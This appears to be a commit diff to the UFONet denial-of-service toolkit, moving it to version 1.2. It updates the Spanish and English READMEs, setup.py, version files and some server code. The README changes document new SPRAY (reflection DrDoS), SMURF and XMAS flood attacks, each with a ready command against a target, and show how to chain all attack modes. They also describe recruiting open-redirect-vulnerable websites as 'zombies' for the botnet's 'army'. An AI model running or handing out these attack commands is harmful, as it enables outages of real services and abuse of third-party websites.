-Ambos ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo:
+O hacer un ataque SPRAY ('root' requerido) para lanzar una Denegación de Servicio Distribuída y Reflejada (DrDoS):
+
+     sudo python ufonet -a http://target.com --spray 100
+
+Un ataque SMURF ('root' requerido) para enviar paquetes de 'Propagación' ICMP de manera distribuída:
+
+     sudo python ufonet -a http://target.com --smurf 101
 
-     ./python ufonet -a http://target.com --loic 100 --loris 100
+O un ataque XMAS ('root' requerido) que inundará tu objetivo con paquetes 'Árbol de Navidad':
 
-     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100
+     sudo python ufonet -a http://target.com --xmas 101
+
+Todos los ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo:
+
+     python ufonet -a http://target.com --loic 100 --loris 100
+
+     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101
 
 ###############################
 # Actualizando
@@ -416,6 +433,10 @@ más algunas "extra":
 # Timelog
 ###############################
 
+--------------------------
+31.12.2018 : v.1.2
+--------------------------
+
 --------------------------
 26.09.2018 : v.1.1
 --------------------------

+ 34 - 14
docs/README.txt

@@ -42,7 +42,7 @@ UFONet - is a toolkit designed to launch DDoS and DoS attacks.
 See these links for more info:
 
    - CWE-601:Open Redirect: 
-     http://cwe.mitre.org/data/definitions/601.html
+     https://cwe.mitre.org/data/definitions/601.html
 
    - OWASP:URL Redirector Abuse: 
      https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
@@ -112,8 +112,8 @@ By default UFONet will use a search engine called 'Yahoo'. But you can choose a
 
 This is the list of available search engines with last time that they were working:
 
-        - bing [26/09/2018: OK!]
-        - yahoo [26/09/2018: OK!]
+        - bing  [30/12/2018: OK!]
+        - yahoo [30/12/2018: OK!]
 
 You can also search massively using all search engines supported:
 
@@ -130,11 +130,11 @@ Or you can make the tool to search for the maximun number of results automatical
 At the end of the process, you will be asked if you want to check the list retrieved to see 
 if the urls are vulnerable.
 
-       Want to check if they are valid zombies? (Y/n)
+       Do you want to check if the NEW possible zombies are valid? (Y/n)
 
-Also, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
+After that, you will be asked whether to update the list by automatically adding only the 'vulnerable' web apps.
 
-       Want to update your list? (Y/n)
+       Do you want to update your army? (Y/n)
 
 If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
 
@@ -178,7 +178,11 @@ Finally, you can order your 'zombies' to attack you and see how they reply to yo
 At the end of the process, you will be asked if you want to check the list retrieved to see 
 if the urls are vulnerable.
 
-       Want to check if they are valid zombies? (Y/n)
+       Do you want to check if the NEW possible zombies are valid? (Y/n)
+
+After that, you will be asked whether to update the list by automatically adding only the 'vulnerable' web apps.
+
+       Do you want to update your army? (Y/n)
 
 If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
 
@@ -343,11 +347,23 @@ And you can connect UFOSYN (it requires 'root' access) to start a powerful TCP/S
 
      sudo python ufonet -a http://target.com --ufosyn 100
 
-Both ways could be combined, so UFONet can attack DDoS and DoS, at the same time:
+Or make a SPRAY ('root' required) attack to launch a Distributed 'Reflection' Denial of Service (DrDoS):
+
+     sudo python ufonet -a http://target.com --spray 100
+
+A SMURF ('root' required) attack to send Distributed ICMP 'Broadcast' packets:
+
+     sudo python ufonet -a http://target.com --smurf 101
+
+Or an XMAS ('root' required) attack that will flood your target with 'Christmas Tree' packets:
 
-     ./python ufonet -a http://target.com --loic 100 --loris 100
+     sudo python ufonet -a http://target.com --xmas 101
 
-     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100
+All methods can be combined, so UFONet can launch DDoS and DoS attacks at the same time:
+
+     python ufonet -a http://target.com --loic 100 --loris 100
+
+     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101
 
 ###############################
 # Updating
@@ -411,6 +427,10 @@ This will open a tab on your default browser with all features of the tool and s
 # Timelog
 ###############################
 
+--------------------------
+31.12.2018 : v.1.2
+--------------------------
+
 --------------------------
 26.09.2018 : v.1.1
 --------------------------
@@ -420,19 +440,19 @@ This will open a tab on your default browser with all features of the tool and s
 --------------------------
 
 --------------------------
-14.07.2017 : v.0.9b
+14.07.2017 : v.0.9
 --------------------------
 
 --------------------------
-21.10.2016 : v.0.8b
+21.10.2016 : v.0.8
 --------------------------
 
 --------------------------
-17.08.2016 : v.0.7b
+17.08.2016 : v.0.7
 --------------------------
 
 --------------------------
-05.11.2015 : v.0.6b
+05.11.2015 : v.0.6
 --------------------------
 
 --------------------------

+ 2 - 1
docs/VERSION

@@ -3,7 +3,7 @@ Date	    Size      Version  Alias
 2013-06-18  7.6kB     0.1b
 2013-06-22  8.3kB     0.2b
 2014-09-17  12.6kB    0.3b
-2014-09-27  12.8kB    0.3.1b   Abduction
+2014-09-27  12.8kB    0.3.1b   Abduction!
 2014-12-16  36.3kB    0.4b     Infection!
 2015-05-24  59.0kB    0.5b     Invasion!
 2016-02-20  287.5kB   0.6      Galactic Offensive!
@@ -12,3 +12,4 @@ Date	    Size      Version  Alias
 2017-07-13  872.5kB   0.9      Blazar!
 2018-03-07  947.9kB   1.0      TachYon!
 2018-09-26  950.7kB   1.1      Quantum Hydra!
+2018-12-31  966.9kB   1.2      Armageddon!

+ 1 - 1
docs/manifesto.txt

@@ -61,7 +61,7 @@
 =====-----_________-------------_______________··········:==4day
 ======_________=_=____________________=________==_=_______
 ·······÷÷;;;:·········÷÷÷÷××÷×÷÷×÷×÷÷×÷·÷÷÷÷·×···÷·····:||
- ||  Sluurg! FCKDRM! Sluurg!!!!!                        ||
+ ||  Sluurg! FCK.DRM! Sluurg!!!!!                       ||
 ·······÷÷;;;:·········÷÷÷÷××÷×÷÷×÷×÷÷×÷·÷÷÷÷·×·····÷÷··:||
  ||  In the land of humans; without space for honor,    ||
  ||  In the land of humans; just time for whores,       ||

+ 1 - 1
docs/release.date

@@ -1 +1 @@
-Wen Sep 26 00:11:12 2018
+Mon Dec 31 23:54:22 2018

+ 2 - 2
server/__init__.py

@@ -1,7 +1,7 @@
-#!/usr/bin/env python 
+#!/usr/bin/env python
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51

+ 1 - 11
server/blackhole.py

@@ -7,17 +7,7 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket
-import re
-import time
-import string
-import sys
-import urlparse
-import os
-import traceback
-import gzip
-import shutil
-import tempfile
+import socket, re, time, string, sys, urlparse, os, traceback, gzip, shutil, tempfile
 from threading import *
 
 class Computer(Thread):

docs/blackhole.txt → server/blackhole.txt


+ 1 - 8
server/grider.py

@@ -7,14 +7,7 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket
-import re
-import time
-import string
-import sys
-import urlparse
-import os
-import traceback
+import socket, re, time, string, sys, urlparse, os, traceback
 from threading import *
 
 class Paster(Thread):

docs/grider.txt → server/grider.txt


+ 12 - 4
setup.py

@@ -1,4 +1,12 @@
 #!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
 import sys
 
 if sys.version_info[0] != 2:
@@ -8,7 +16,7 @@ from setuptools import setup, find_packages
 
 setup(
     name='ufonet',
-    version='1.1',
+    version='1.2',
     license='GPLv3',
     author_email='epsylon@riseup.net',
     author='psy',
@@ -16,10 +24,10 @@ setup(
     url='https://ufonet.03c8.net/',
     long_description=open('docs/README.txt').read(),
     packages=find_packages(),
-    install_requires=['GeoIP >= 1.3.2', 'pygeoip >= 0.3.2', 'requests', 'pycrypto >= 2.6.1', 'pycurl >= 7.19.5.1', 'python-whois >= 0.6.5', 'scapy >= 2.3.3'],
+    install_requires=['GeoIP >= 1.3.2', 'pygeoip >= 0.3.2', 'requests', 'pycrypto >= 2.6.1', 'pycurl >= 7.19.5.1', 'python-whois >= 0.6.5', 'scapy >= 2.3.3', 'dnspython'],
     include_package_data=True,
     package_data={
-        'core': ['images/*', 'js/*.css', 'js/*.js', 'js/leaflet/*.css', 'js/leaflet/*.js', 'js/leaflet/images/*', 'js/cluster/*', 'txt/*.txt'],
+        'core': ['js/*.css', 'js/*.js', 'js/leaflet/*.css', 'js/leaflet/*.js', 'js/leaflet/images/*', 'js/cluster/*', 'txt/*.txt', 'images/crew/*', 'images/aliens/*', 'images/*.png', 'images/*.ico'],
         'server': ['*.dat', '*.txt'],
     },
     entry_points={
@@ -30,7 +38,7 @@ setup(
             'ufonet=UFONet:core.main',
         ],
     },
-    keywords='WebAbuse DoS DDoS Botnet Darknet UFONet',
+    keywords='Toolkit WebAbuse DoS DDoS Botnet Darknet UFONet',
     classifiers=[
         'Development Status :: 5 - Production/Stable',
         "Environment :: Web Environment",

+ 2 - 2
ufonet

@@ -1,7 +1,7 @@
-#!/usr/bin/env python 
+#!/usr/bin/env python
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51